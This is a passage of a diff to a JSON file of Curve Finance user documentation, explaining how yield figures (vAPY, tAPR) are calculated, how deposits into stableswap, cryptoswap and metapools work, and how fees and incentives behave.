If the pool has an eligible gauge, then the UI displays the range of possible tAPR values users are earning at present, subject to change in the future. The formula used here to calculate rewards tAPR: $$ tAPR = \\frac{(crv\\_price * inflation\\_rate * relative\\_weight * 12614400)}{working\\_supply * asset\\_price * virtual\\_price} $$ These parameters are obtained from various data sources, mostly on-chain: crv_price: The current price of the $CRV token in USD. This could be extrapolated from on-chain data, but the UI relies on the CoinGecko API to fetch this value. inflation_rate: The inflation rate of the $CRV token, accessed from the rate function of the $CRV token. relative_weight: Based on weekly voting, each Curve pool rewards gauge has a weighting relative to all other Curve gauges. This value can be calculated by calling the same function on the Curve gauge controller contract . https://dao.curve.fi/ working_supply: Accessed by calling the same function on the specific Curve gauge contract for the pool. asset_price: The price of the asset that is, if the pool contains only bitcoin, you would use the current price of $BTC. For v2 pools, this must be calculated by averaging over the specific assets within the pool. virtual_price: The measure of the pool growth over time, as described above. The magic number 12614400 is number of seconds in a year (60 * 60 * 24 * 365 = 31536000) times 0.4. In this case the 0.4 is due to the effect of boosts (minimum boost of 1 / maximum boost of 2.5 = 0.4). As shown in the UI, all tAPR values are displayed as a range, with the base rate on the left of the arrow representing the default rate one would receive if the user has no boost, and the value on the right of the arrow representing the maximum value a user could receive if the user has the maximum boost, which is 2.5 times higher than the minimum boost. Further details about calculating boosts are provided here . For developers, here are relevant links to the technical documentation: About Liquidity Gauges Gauge Controller Gauges for EVM Sidechains Gauge Proxy Incentives tAPR All pools may permissionlessly stream other token rewards without approval from the Curve DAO. The UI displays these bonus rewards only when applicable. In the example of stETH below, note how the pool is streaming $LDO tokens in addition to $CRV rewards. Pool Overview Page stETH Pool Page Further information on these extra incentives is available in the developer documentation. 
The Curve DAO: Liquidity Gauges and Minting CRV Curve 1.0.0 documentation Last update: 2023-08-15 Back to top", + "body": "Calculating Yield Explanation of how the Curve UI displays yield calculations. Like all documentation within this guide, this article is intended to be detailed but non-technical, outside of a few light mathematical formulas. While we highlight specific smart contract function names that the Curve UI may reference for convenience, no knowledge of coding is otherwise necessary to understand this article. Developers seeking a more in-depth explanation of these concepts should consult the technical documentation at https://curve.readthedocs.io/ Types of Yield Curve UI displaying the different types of Curve yield (tAPY and tAPR). In the above screenshot you can see that a Curve pool has the potential to offer many different types of yield. The documentation provides an overview of the different types of yield here: Understanding $CRV It's important to remember that these numbers are projections of historical pool performance. The user would get this rate only if the pool's performance stayed exactly the same for one year. These yield types are: Base vAPY: Shown on the first line, this number represents the fees that accrue to holders of the LP token based on trading volume. More Info $CRV Rewards tAPR: Shown on the second line, the rewards tAPR represents the rate of $CRV token emissions one would have earned if the pool has a rewards gauge and the user stakes into this rewards gauge. The number is listed as a range of possible rewards; based on the user's locked veCRV, the size of this boost can vary. More Info Incentives Rewards tAPR: Some pools also choose to stream rewards in the form of a different token; this is represented on the third line if applicable. 
vAPY stands for variable annual percentage yield; this value is an annualized estimate of the trading fee yield based on the past day's trading activity, inclusive of any effect of compounding. The rewards tAPR stands for token annual percentage rate; token rewards must be claimed manually and therefore do not automatically compound, so rate is the more proper term. Base vAPY When Curve pools are launched, they receive a value for both the fee (the overall fee applied to trades) and the admin_fee (the percentage of this fee that goes to the Curve DAO as opposed to pool LPs). These parameters are directly viewable on the smart contract through the corresponding function names. These fees are displayed on the Curve UI pool page: These parameters may also be updated in the future by the Curve DAO by calling the commit_new_fee method. If the fees are in the process of being changed, the pending values are readable in the smart contract via the future_fee and future_admin_fee methods. The fees are specifically earned or charged every time a user interacts with a pool contract through a transaction which may affect the pool balances. For example, directly calling the exchange function would rebalance the pool, so a fee clearly applies. If you add or remove liquidity in an imbalanced fashion, this would also adjust the ratios of tokens within the pool and thus be subject to fees. No fees are charged if a user adds or removes coins in a balanced proportion. When you call methods to preview how many tokens you might receive for interacting with a pool (i.e. get_dy or calc_token_amount), the values they return are usually, but not always, inclusive of any fees; the UI calculations are intended to make any corrections where appropriate, but be sure to ask the support team if you have questions. Theoretically, one could calculate the base vAPY for any period by calculating the fees for every transaction and summing over the entire range. However, the Curve UI utilizes a simpler methodology to calculate the base vAPY, where t is the time in days: $$ \\left[ \\frac{virtual\\_price({t=0})}{virtual\\_price({t=-1})} \\right] ^{365} - 1 $$ In other words, the vAPY measures the change in the pool's \"virtual price\" between today and yesterday, then annualizes this rate. The \"virtual price\" is a measure of the pool's growth over time, and is viewable directly on the UI. The UI receives this value directly by calling the get_virtual_price method on the pool contract. Every time a transaction occurs that charges a fee, the virtual price is incremented accordingly. Thus, when a pool launches with a virtual price of exactly 1, if the pool's virtual price is 1.01 at some future time, an LP holding a token has seen the token's value increase by 1%. $$ \\frac{1.01}{1.00} - 1 = 0.01 = 1\\% $$ A virtual price of 1.01 means an LP will get 1% more value back on removing liquidity. Similarly, new users adding liquidity will receive 1% fewer LP tokens on deposit. For pegged stablecoin pools, the virtual price can easily be utilized to calculate the vAPY of the pool since inception with no further calculations necessary. For v2 pools, one must also consider the fluctuating prices of the underlying assets. For developers, here are more details about trade fees from the technical documentation: About Trade Fees Claiming Admin Fees Fee Distribution 
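To make the annualization concrete, here is a short Python sketch of the formula above; the two virtual prices are hypothetical readings of get_virtual_price taken one day apart.

```python
# Base vAPY from two daily virtual-price readings (hypothetical values).
vp_yesterday = 1.0230  # virtual_price at t = -1
vp_today = 1.0231      # virtual_price at t = 0

base_vapy = (vp_today / vp_yesterday) ** 365 - 1
print(f"base vAPY: {base_vapy:.2%}")  # ~3.63% if this daily growth persisted
```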
CRV Rewards tAPR The Curve DAO also authorizes some pools to receive bonus rewards from $CRV token emissions, as described in the Understanding Gauges section of the documentation. If the pool has an eligible gauge, then the UI displays the range of possible tAPR values users are earning at present, subject to change in the future. The formula used to calculate the rewards tAPR: $$ tAPR = \\frac{(crv\\_price * inflation\\_rate * relative\\_weight * 12614400)}{working\\_supply * asset\\_price * virtual\\_price} $$ These parameters are obtained from various data sources, mostly on-chain: crv_price: The current price of the $CRV token in USD. This could be extrapolated from on-chain data, but the UI relies on the CoinGecko API to fetch this value. inflation_rate: The inflation rate of the $CRV token, accessed from the rate function of the $CRV token. relative_weight: Based on weekly voting, each Curve pool rewards gauge has a weighting relative to all other Curve gauges. This value can be calculated by calling the function of the same name on the Curve gauge controller contract ( https://dao.curve.fi/ ). working_supply: Accessed by calling the function of the same name on the specific Curve gauge contract for the pool. asset_price: The price of the asset: if the pool contains only bitcoin, you would use the current price of $BTC. For v2 pools, this must be calculated by averaging over the specific assets within the pool. virtual_price: The measure of the pool's growth over time, as described above. The magic number 12614400 is the number of seconds in a year (60 * 60 * 24 * 365 = 31536000) times 0.4. The 0.4 is due to the effect of boosts (minimum boost of 1 / maximum boost of 2.5 = 0.4). As shown in the UI, all tAPR values are displayed as a range, with the base rate on the left of the arrow representing the default rate one would receive with no boost, and the value on the right of the arrow representing the maximum value a user could receive with the maximum boost, which is 2.5 times higher than the minimum. Further details about calculating boosts are provided here. For developers, here are relevant links to the technical documentation: About Liquidity Gauges Gauge Controller Gauges for EVM Sidechains Gauge Proxy 
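As a worked illustration of the rewards tAPR formula above, here is a hedged Python sketch. Every input value is a hypothetical placeholder for the on-chain and CoinGecko data the UI fetches; the printed range mirrors the UI's no-boost and 2.5x maximum-boost figures.

```python
# Rewards tAPR per the formula above; every input below is hypothetical.
crv_price = 0.50             # USD, e.g. via the CoinGecko API
inflation_rate = 6.0         # CRV emitted per second, from the CRV rate() function
relative_weight = 0.02       # this gauge's share, from the gauge controller
working_supply = 50_000_000  # from the pool's gauge contract
asset_price = 1.0            # USD price of the pooled asset (stablecoin pool)
virtual_price = 1.02         # pool growth measure, as described above

tapr = (crv_price * inflation_rate * relative_weight * 12_614_400) / (
    working_supply * asset_price * virtual_price
)
print(f"rewards tAPR: {tapr:.2%} -> {2.5 * tapr:.2%}")  # unboosted -> max boost
```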
Incentives tAPR All pools may permissionlessly stream other token rewards without approval from the Curve DAO. The UI displays these bonus rewards only when applicable. In the example of stETH below, note how the pool is streaming $LDO tokens in addition to $CRV rewards. Pool Overview Page stETH Pool Page Further information on these extra incentives is available in the developer documentation. The Curve DAO: Liquidity Gauges and Minting CRV Curve 1.0.0 documentation 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Deposit faqs", + "title": "Charts and Pool Activity", + "html_url": "https://resources.curve.fi/lp/charts_poolactivity/", + "body": "Charts and Pool Activity The Curve UI offers a variety of charts related to token prices, as well as an overview of exchanges and liquidity activities (such as adding or removing liquidity) for each pool. Info Chart and Pool Activity information is currently only available for pools on Ethereum mainnet. Charts LP tokens are tokens received upon depositing assets into a liquidity pool. These tokens represent the holder's share of the pool and can be redeemed for a portion of the funds, plus any fees accrued over time. Similar to other tokens, their value is contingent on the prices of the underlying assets in the liquidity pool. Navigating to the Chart tab reveals a graphical interface of the LP token price in relation to, for example, USDT. In the top right corner, options are available to expand/minimize or refresh the chart, as well as to adjust its timeframe. Clicking on LP Token Price (USDT) reveals a drop-down menu with additional charts. Pool Activity Besides a chart for prices, the UI also provides an overview of swaps and liquidity actions for the pool under the Pool Activity tab. On the Swaps tab, the interface shows the tokens swapped and the time of each transaction, indicating how many hours or minutes ago it occurred. Clicking on a specific swap will redirect the user to the transaction on Etherscan. Navigate to the Liquidity tab to display deposits and withdrawals in the pool. 
2023-10-25 Back to top", + "labels": [ + "Documentation" + ] + }, + { + "title": "Deposit FAQ", "html_url": "https://resources.curve.fi/lp/deposit-faqs/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Deposit faqs Table of contents Deposit FAQs What is the y in the y pools (also what is Yearn)? What is the deposit wrapped option? What happens when you provide liquidity on Curve? Does the coin I deposit matter? Understanding deposit bonuses But does that mean I can still withdraw in my favorite stable coin? How quickly does interest accrue/compound? What is arbitrage? What are incentivized pools? What makes the incentives APR move? Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Deposit FAQs What is the y in the y pools (also what is Yearn)? What is the deposit wrapped option? What happens when you provide liquidity on Curve? Does the coin I deposit matter? Understanding deposit bonuses But does that mean I can still withdraw in my favorite stable coin? How quickly does interest accrue/compound? What is arbitrage? What are incentivized pools? What makes the incentives APR move? Deposit faqs Deposit FAQs What is the y in the y pools (also what is Yearn)? Yearn is a yield aggregator. You might think that Compound doesnt always have the best lending rates and you would be right thus the yToken balances automatically your stablecoin to the protocol(s) with the better rates (Compound, Aave and dYdX). Its free and non-custodial (as is Curve) but it is also why the yPools are considered more risky as you use a series of protocols that could themselves have critical vulnerabilities. What is the deposit wrapped option? (This applies to metapools or pools with tokens with c tokens or y tokens). If you deposit a stablecoin to one of the pools with lending, Curve will automatically wrap your token to a cToken (for Compound) or a yToken(for yearn). The option is simply there if you have already previously wrapped your tokens on yearn or lent them on Compound. If your stablecoin is in its original form, you can ignore this option. What happens when you provide liquidity on Curve? When you go to the deposit page and deposit one stablecoin, it then gets split between each token in the pool. 
Thats something you have to keep in mind because if you were to deposit 1000 DAI in the yPool, a per the screenshot below, your balance would be roughly equal to 158.9 DAI, 142.4 USDC, 582.4 USDT and 121.6 TUSD. Those values change constantly as people trade and arb the price of stable coins. Does the coin I deposit matter? Besides the deposit bonus explained below, it doesnt matter. Your tokens will get split into the pool and it doesnt affect your returns so you can deposit one, some or all the coins into the pool without worrying about it affecting your returns. Understanding deposit bonuses On the screenshot above, you can see TUSD is quite low on the pool so if your plan was to join the yPool, you would ideally deposit TUSD into it. As you can see on the screenshot, you would get an instant 0.2% bonus for depositing TUSD into the pool. The main reason for this is that TUSD is currently slightly more expensive so if you went to a centralized exchange you might sell it for $1.007 instead of $1. The deposit bonus reflects that. The other reason behind this is that the pools are always trying to balance themselves and go back to equal parts (in this case 25% TUSD) so depositing the coin with the lowest share will get you a deposit bonus. But does that mean I can still withdraw in my favorite stable coin? When you withdraw, the same principle applies (but reversed). If you withdraw the stable coin with the biggest share, you would get a bonus but you still choose what stable coin you want to withdraw. How quickly does interest accrue/compound? Interests for pools using lending protocols compound every block or 15 seconds or immediately after fees are paid. Its also compounded automatically. What is arbitrage? Arbitrage is the simultaneous buying and selling of, in our case, a token to make a profit. Because cryptocurrency markets can often lack liquidity, there are often opportunities for traders to take advantage of price discrepancies to make a profit which can be helped by protocols like Curve. An example of that below: https://etherscan.io/tx/0x259b7ac1f50554fe5ddcfeea7b4fa90ad70356ddfbbd341289db0dfbf99447f9 In this transaction, someone used Curve and OasisDex and made around $200. This goes back to what was discussed earlier with liquidity pools. The idea is that is you incentivize traders to take advantage of price discrepancies which we all get rewarded for. What are incentivized pools? Liquidity pools (particularly one without an opportunity cost) are a great way to help stable coins keep their pegs. It makes easy for traders to arb (see question above) when the price slips off the peg which is very important for all the companies and foundations developing stable coins as having a $0.98 stablecoin is never a good look. As a result, some pools on Curve are incentivized. That means that on top of trading fees and lending fees, the companies will give rewards to people providing liquidity to the pools with their coins. What makes the incentives APR move? 
The steth pool in this screenshot earns another 2.69% of LDO per year and there are three variables that can make this change: The LDO distributed is based on the number of people staking their LP tokens, which means your share of rewards gets lower if more people start staking The price of LDO (price of LDO going up would make the yearly bonus go up) The size of weekly rewards (48,000 SNX as of today) could also be lowered as Lido reevaluates its partnership with Curve Last update: 2023-08-15 Back to top", + "body": "Deposit FAQ What is the deposit wrapped option? (This applies to metapools or pools with c-tokens or a-tokens.) If you deposit a stablecoin to one of the pools with lending, Curve will automatically wrap your token to a cToken (for Compound) or an aToken (for AAVE). The option is simply there if you have already previously lent your tokens on Compound or AAVE. If your stablecoin is in its original form, you can ignore this option. If you deposit into a metapool and you hold the corresponding base pool token (for example, 3CRV), you can also use the \"deposit wrapped\" option to deposit this token. What happens when you provide liquidity on Curve? When you go to the deposit page and deposit one stablecoin, it then gets split between each token in the pool. 
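As a rough sketch of that split, the snippet below spreads a single-coin deposit across the pool in proportion to its current balances. The balances are hypothetical, and the snippet ignores the small deposit bonus or penalty discussed next, so the UI's exact figures will differ slightly.

```python
# Approximate exposure after depositing one coin into a four-coin pool.
# Pool balances are hypothetical; the bonus/penalty mechanism is ignored.
pool_balances = {"GUSD": 3_907_000, "DAI": 1_200_000,
                 "USDC": 1_198_000, "USDT": 3_626_000}

deposit = 1_000.0  # e.g. 1000 DAI
total = sum(pool_balances.values())
exposure = {coin: deposit * bal / total for coin, bal in pool_balances.items()}
print(exposure)  # GUSD ~393.4, DAI ~120.8, USDC ~120.6, USDT ~365.1
```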
That's something you have to keep in mind, because if you were to deposit 1000 DAI in the GUSD pool, as per the screenshot below, your balance would be roughly equal to 390.7 GUSD, 120 DAI, 119.8 USDC and 362.6 USDT. Those values change constantly as people trade and arb the price of stable coins. Does the coin I deposit matter? Besides the deposit bonus explained below, it doesn't matter. Your tokens will get split into the pool and it doesn't affect your returns, so you can deposit one, some or all the coins into the pool without worrying about it affecting your returns. Understanding deposit bonuses On the screenshot above, you can see GUSD is quite low, as it should make up 50% of the total pool because it's a metapool paired against 3CRV. So if your plan was to join the gusd-pool, you would ideally deposit GUSD into it. As you can see on the screenshot, you would get an instant 0.0082% bonus for depositing GUSD into the pool. The main reason for this is that GUSD is currently slightly more expensive, so if you went to a centralized exchange you might sell it for $1.007 instead of $1. The deposit bonus reflects that. The other reason behind this is that the pools are always trying to balance themselves and go back to equal parts (in this case 50% GUSD), so depositing the coin with the lowest share will get you a deposit bonus. But does that mean I can still withdraw in my favorite stable coin? When you withdraw, the same principle applies (but reversed). If you withdraw the stable coin with the biggest share, you would get a bonus, but you still choose what stable coin you want to withdraw. How quickly does interest accrue/compound? Interest for pools using lending protocols compounds every block (roughly every 15 seconds), immediately after fees are paid. It is also compounded automatically. What is arbitrage? Arbitrage is the simultaneous buying and selling of, in our case, a token to make a profit. Because cryptocurrency markets can often lack liquidity, there are often opportunities for traders to take advantage of price discrepancies to make a profit, which can be helped by protocols like Curve. An example of that below: https://etherscan.io/tx/0x259b7ac1f50554fe5ddcfeea7b4fa90ad70356ddfbbd341289db0dfbf99447f9 In this transaction, someone used Curve and OasisDex and made around $200. This goes back to what was discussed earlier with liquidity pools. The idea is that you incentivize traders to take advantage of price discrepancies, which we all get rewarded for. What are incentivized pools? Liquidity pools (particularly ones without an opportunity cost) are a great way to help stable coins keep their pegs. It makes it easy for traders to arb (see question above) when the price slips off the peg, which is very important for all the companies and foundations developing stable coins, as having a $0.98 stablecoin is never a good look. As a result, some pools on Curve are incentivized. That means that on top of trading fees and lending fees, the companies will give rewards to people providing liquidity to the pools with their coins. What makes the incentives APR move? 
The steth pool in this screenshot earns another 2.69% of LDO per year, and there are three variables that can make this change: the LDO distributed is based on the number of people staking their LP tokens, which means your share of rewards gets lower if more people start staking; the price of LDO (the price of LDO going up would make the yearly bonus go up); and the size of weekly rewards (48,000 LDO as of today), which could also be lowered as Lido reevaluates its partnership with Curve. 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Depositing", + "title": "Overview", "html_url": "https://resources.curve.fi/lp/depositing/", - "body": "Depositing Before depositing... Before depositing into a Curve pool, it is highly recommended to familiarise yourself with how Curve works, how it makes money and its basic mechanisms. You can do so by visiting the page below: Understanding Curve v1 Choosing the right pool Curve has many pools to choose from currently accepting stable coins and tokenised Bitcoin (Bitcoin on Ethereum). If you are not sure which pool is right for you, click the link below: Understanding Curve Pools Last update: 2023-08-15 Back to top", + "body": "
Overview Before depositing... Before depositing into a Curve pool, it is highly recommended to familiarise yourself with how Curve works, how it makes money and its basic mechanisms. You can do so by visiting the pages below: Understanding Curve v1 Understanding Curve v2 Choosing the right pool Curve has many pools to choose from, currently accepting stable coins and tokenised Bitcoin (Bitcoin on Ethereum). If you are not sure which pool is right for you, click the link below: Understanding Curve Pools 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2066,39 +2082,47 @@ { "title": "Understanding curve pools", "html_url": "https://resources.curve.fi/lp/understanding-curve-pools/", - "body": "
Understanding curve pools Understanding Curve Pools As you should know, providing liquidity has its fair share of risks so in this article, we review the different Curve pools to help you find one that matches your risk tolerance while explaining the risks involved with being a liquidity provider on Curve. There are currently several Curve pools with new pools added all the time. Its important to understand that when you provide liquidity to a pool, no matter what coin you deposit, you essentially gain exposure to all the coins in the pool which means you want to find a pool with coins you are comfortable holding. Before we continue, we assume you have familiarized yourself with the basics of Curve: Understanding Curve v1 All Curve liquidity gauges receive CRV based on how much the DAO allocates to it. What are liquidity pools? If you are new to Ethereum or DeFi, liquidity pools are a seemingly complicated concept to understand. Liquidity pools are pools of tokens that sit in smart contracts. If you were to create a pool of DAI and USDC where 1 DAI = 1 USDC. You would have the same amount of tokens, lets say 1,000 tokens (1,000 DAI and 1,000 USDC) in the pool. If trader 1 comes and exchange 100 DAI for 100 USDC, you would then have 1,100 DAI and 900 USDC in the pool so the price would tilt slightly lower for USDC to encourage another trader to exchange USDC for DAI and average the pool back. You can see those details for each pool and it is something you can take advantage of when depositing. On the screenshot above for the TriCrypto v2 Pool , the three volatilely priced tokens are held in proportions similar to their price. If the coins are out of proportion traders are incentivized to take advantage of the arbitrage, which will push the balances in the pool back towards proportion Base vAPY To understand what the different pools do, its also important to understand how Curve makes money for liquidity providers. Curve interests come from trading fees. Every time someone uses Curve to exchange tokens, through the Curve website, 1inch, Paraswap or another dex aggregator, a small fee is distributed to liquidity providers. This is why base vAPY increases with volume on Curve. Some pools (Compound, PAX, Y, BUSD) also earn interest from lending protocols. Behind the scenes, those four pools also use lending protocols (like Compound or AAVE) to help generate more interest for liquidity providers. Whilst it means those pools can be better performers when lending rates are high, its also worth noting it also adds more layers of risks. All pools earn interest from trading fees. Some pools also earn interest from lending and there are also some pools with incentives. You can also receive CRV when you provide liquidity on Curve Finance. Each liquidity gauge receives a different amount of CRV based on how much the DAO allocates to it. Every time someone makes a trade on Curve.fi, liquidity providers (people who have deposited funds onto Curve) get a small fee split evenly between all providers, this is why you will see high vAPYs on days with high volume and high volatility. Its important to note that because fees are dependent on volume, daily vAPYs can often be quite low just like they can be very high. What are Curve fees? Swap fees are typically around 0.04% which is thought to be the most efficient when exchange stable coins on Ethereum. Deposit and withdrawals have fees between 0% and 0.02% depending if depositing and withdrawing in imbalance or not. 
If fees were 0%, users could, for example, deposit in USDC and withdraw in USDT for free. Balanced deposits or withdrawals are free. Last update: 2023-09-04 Back to top", + "body": "Understanding curve pools As you should know, providing liquidity has its fair share of risks, so in this article we review the different Curve pools to help you find one that matches your risk tolerance, while explaining the risks involved with being a liquidity provider on Curve. There are currently several Curve pools, with new pools added all the time. It's important to understand that when you provide liquidity to a pool, no matter what coin you deposit, you essentially gain exposure to all the coins in the pool, which means you want to find a pool with coins you are comfortable holding. Before we continue, we assume you have familiarized yourself with the basics of Curve: Understanding Curve v1 All Curve liquidity gauges receive CRV based on how much the DAO allocates to them. What are liquidity pools? If you are new to Ethereum or DeFi, liquidity pools can seem a complicated concept to understand. Liquidity pools are pools of tokens that sit in smart contracts. If you were to create a pool of DAI and USDC where 1 DAI = 1 USDC, you would have the same amount of each token, let's say 1,000 of each (1,000 DAI and 1,000 USDC) in the pool. If a trader comes and exchanges 100 DAI for 100 USDC, you would then have 1,100 DAI and 900 USDC in the pool, so the price of DAI would tilt slightly lower to encourage another trader to exchange USDC for DAI and bring the pool back into balance. You can see those details for each pool, and it is something you can take advantage of when depositing. On the screenshot above for the TriCrypto v2 Pool, the three volatile tokens are held in proportions similar to their prices. 
If the coins are out of proportion, traders are incentivized to take advantage of the arbitrage, which will push the balances in the pool back towards proportion. Base vAPY To understand what the different pools do, it's also important to understand how Curve makes money for liquidity providers. Curve's interest comes from trading fees. Every time someone uses Curve to exchange tokens, whether through the Curve website, 1inch, Paraswap or another DEX aggregator, a small fee is distributed to liquidity providers. This is why the base vAPY increases with volume on Curve. Some pools (Compound, PAX, Y, BUSD) also earn interest from lending protocols. Behind the scenes, those four pools also use lending protocols (like Compound or AAVE) to help generate more interest for liquidity providers. Whilst it means those pools can be better performers when lending rates are high, it's also worth noting that it adds more layers of risk. All pools earn interest from trading fees. Some pools also earn interest from lending, and there are also some pools with incentives. You can also receive CRV when you provide liquidity on Curve Finance. Each liquidity gauge receives a different amount of CRV based on how much the DAO allocates to it. Every time someone makes a trade on Curve.fi, liquidity providers (people who have deposited funds onto Curve) get a small fee split evenly between all providers; this is why you will see high vAPYs on days with high volume and high volatility. It's important to note that because fees are dependent on volume, daily vAPYs can often be quite low, just as they can be very high. What are Curve fees? Swap fees are typically around 0.04%, which is thought to be the most efficient when exchanging stable coins on Ethereum. Deposits and withdrawals have fees between 0% and 0.02%, depending on whether they are made in imbalance or not. If fees were 0%, users could, for example, deposit in USDC and withdraw in USDT for free. Balanced deposits or withdrawals are free. 
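To illustrate the fee mechanics described above, here is a small hedged sketch. The 0.04% swap fee comes from the article; the 50% admin_fee split is an illustrative assumption (the actual values are read from each pool contract's fee and admin_fee methods).

```python
# Where the swap fee on a trade goes, with illustrative parameters.
fee = 0.0004      # 0.04% overall swap fee (typical, per the article)
admin_fee = 0.50  # DAO's share of the fee (assumed here; read on-chain in practice)

trade = 100_000.0               # hypothetical USDC swap
total_fee = trade * fee         # 40.0 paid in fees
to_dao = total_fee * admin_fee  # 20.0 to the Curve DAO
to_lps = total_fee - to_dao     # 20.0 accrues to LPs via the virtual price
print(total_fee, to_dao, to_lps)
```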
2023-09-28 Back to top", + "labels": [ + "Documentation" + ] + }, + { + "title": "Despositing into a cryptoswap-pool", + "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-a-cryptoswap-pool/", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a cryptoswap-pool Table of contents Depositing into the pool Confirming and staking Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Depositing into the pool Confirming and staking Home Liquidity Providers Depositing Despositing into a cryptoswap-pool Cryptoswap pools contain two volatile assets and are designed to offer deep liquidity for a wide variety of assets with different levels of volatility. Learn more about v2 pools For instance, the CVX/ETH pool is used in the examples below. Depositing into the pool Visit the deposit page ( https://curve.fi/#/ethereum/pools/cvxeth/deposit ). You will need at least one of the two tokens in the pool to deposit. CVX/ETH-pool consists of CVX and ETH. First, it's important to understand that you don't have to deposit both coins, you can deposit one or both of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small positive price impact. Since crypto pools have a rebalancing mechanism, the balances of the pool should be relatively equal. Second, once you deposit one coin, it gets split over the two different coins in the pool which means you now have exposure to all of them . The first checkbox (Add all coins in a balanced proportion) allows you to deposit both coins in the same proportion they currently are in the pool, resulting in no price impact. The second checkbox (Deposit Wrapped) allows users to deposit wrapped ETH (wETH) instead of plain ETH. Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will deposit your into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. 
They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. This second transaction will only pop up if you deposited your tokens under the \"Deposit and stake\" tab; otherwise it will just deposit the tokens in the pool. If you already have LP tokens, you can also directly stake them into the gauge under the 'Stake' tab. Once that's done, you're providing liquidity and staking, so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO: Boosting your CRV Rewards Staking your $CRV 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Depositing into a metapool", + "title": "Depositing into a metapool", "html_url": "https://resources.curve.fi/lp/depositing/depositing-into-a-metapool/", - "body": "Depositing into a Metapool Metapools is a new concept to Curve Finance, it allows a single coin to be pooled with all the coins in another (base) pool without diluting its liquidity. Currently, the most common base pool is the 3Pool. It uses the three most liquid stable coins (USDT-USDC-DAI). Base & MetaPools Depositing Metapools offer several options for deposits. For example, in the [GUSD,[3Pool]] Metapool you can deposit the following: GUSD Any of the 3Pool (DAI-USDC-USDT) 3Pool LP token (3crv) When becoming a liquidity provider, you don't have to deposit all the coins, you can deposit one or several of the coins in the pool and it won't affect your returns. Depositing the coin with the smallest share in the pool will result in a small deposit bonus. Second, once you deposit one stable coin, it gets split over the four different coins in the pool which means you now have exposure to all of them . 
The first checkbox (Add all coins in a balanced proportion) allows you to deposit all four coins in the same proportion they currently are in the pool. The deposit wrapped option lets you deposit the base pool token (usually 3Pool). If you don't want to add all your stable coins, just click the \"Use maximum amount of coins available\" checkbox and enter the number of coins you wish to deposit and click \"Deposit and Stake\". If you deposit 3Pool LP token into a Metapool, you will be earning at the rate of the Metapool gauge but you earn trading fees from both the base and meta pool. Confirming and staking You will then be asked to approve the Curve Finance contract, follow by a deposit transaction which will wrap your stable coins and deposit them into the pool. This transaction can be expensive so you ideally want to wait for gas to be fairly cheap if this will impact the size of your deposit. After depositing in the pool, you receive liquidity provider (LP) tokens. They represent your share of ownership in the pool and you will need them to stake for CRV. After depositing, you will be prompted with a new transaction that will deposit your LP tokens in the DAO liquidity gauge. Confirming the transaction will let you mine CRV. Once that's done, you're providing liquidity and staking so all that's left to do is wait for your trading fees to accrue. You can click the link below to learn how to boost your CRV rewards by locking CRV on the Curve DAO. Boosting your CRV Rewards Staking your $CRV Last update: 2023-08-15 Back to top", + "body": "Depositing into a metapool Metapools are a newer concept for Curve Finance: they allow a single coin to be pooled with all the coins in another (base) pool without diluting its liquidity. Currently, the most common base pool is the 3Pool, which uses the three most liquid stable coins (USDT-USDC-DAI). Base & MetaPools Depositing Metapools offer several options for deposits. 
